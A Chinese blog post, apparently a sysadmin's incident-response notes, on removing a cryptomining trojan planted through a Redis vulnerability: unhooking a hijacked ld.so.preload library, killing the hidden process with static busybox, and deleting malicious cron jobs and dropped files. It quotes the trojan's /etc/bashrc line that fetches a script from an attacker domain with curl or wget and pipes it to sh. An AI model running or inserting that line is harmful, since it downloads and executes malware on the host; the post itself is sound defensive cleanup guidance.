• redis漏洞攻击


    参考:

    https://www.cnblogs.com/kobexffx/p/11000337.html

    利用redis漏洞获得root权限,挖矿. 解决方法: 用普通帐号启redis,用云的redis

    清理步骤
    背景描述:
    在清除过程中,由于系统动态链接被劫持导致无法正常操作木马进程文件,需要把下面的动态链接库文(libEGLD.so ld.so.preload)件移到其他地方或删除掉。

    一、移除木马生成的动态链接库,由于被修改了动态链接库,系统的命令ps显示的进程并不完全,隐藏掉了木马进程。
    mv /usr/local/lib/libEGLD.so /root/
    mv /etc/ld.so.preload /root/

    二、kill掉木马进程,木马进程名称:
    1.下载busybox (https://busybox.net/downloads/binaries/1.20.0/busybox-x86_64)
    因为系统动态链接库被劫持,导致系统命令不会显示出对应木马进程。该工具集成了linux常用命令且全为静态编译,不受劫持干扰。

    2.利用busybox执行top 查找占用cpu高的异常进程
    实例:
    ./busybox top

    3. 找到对应进程后kill掉。
    实例:
    ../busybox kill -9 pid
    或者 ./busybox pkill 异常进程名称
    三、清除掉crontab的木马定时任务:
    1. /var/spool/cron/目录下所有包含 lsd.systemten.org域名的记录的文件
    2. /etc/cron.d/root目录下所有包含 lsd.systemten.org域名的记录的文件

    四,删除木马释放的文件:
    /usr/local/bin/writeable
    /usr/libexec/writeable
    /usr/bin/writeable
    /etc/rc0.d/K01sshservice
    /etc/rc1.d/K01sshservice
    /var/spool/cron/crontabs/root
    /etc/rc2.d/S01sshservice
    /etc/rc3.d/S01sshservice
    /etc/rc4.d/S01sshservice
    /etc/rc5.d/S01sshservice
    /etc/rc6.d/K01sshservice
    /tmp/ccEIF3Ld.s
    /tmp/ccstOJoH.o
    /tmp/cc1iGERd.res
    /tmp/ccgwA0Gd.c
    /var/spool/cron/crontabs/tmp.XUYfjh
    /tmp/.XImunix
    /usr/local/sbin/sshd
    /usr/lib/systemd/system/sshservice.service
    /usr/local/lib/libEGLD.c
    /var/spool/cron/crontabs/tmp.WtljMO
    /var/spool/cron/crontabs/tmp.olDaF7


    五、恢复木马修改过的文件
    1.恢复被木马修改过的域名指向
    /etc/hosts
    2.删除被木马添加的内容
    /etc/bashrc
    内容: curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh

  • 相关阅读:
    U8g2库I2C总线再次突破性调试成功
    要学的东西太多了,还想学习opencv
    中断知识
    别人做的扫地机器人,有机会我也想搞一台!
    团队冲刺第五天
    第八周学习进度
    团队冲刺第四天
    构建之法1
    团队冲刺第三天
    团队冲刺第二天
  • 原文地址:https://www.cnblogs.com/hongfeng2019/p/11524292.html
Copyright © 2020-2023  润新知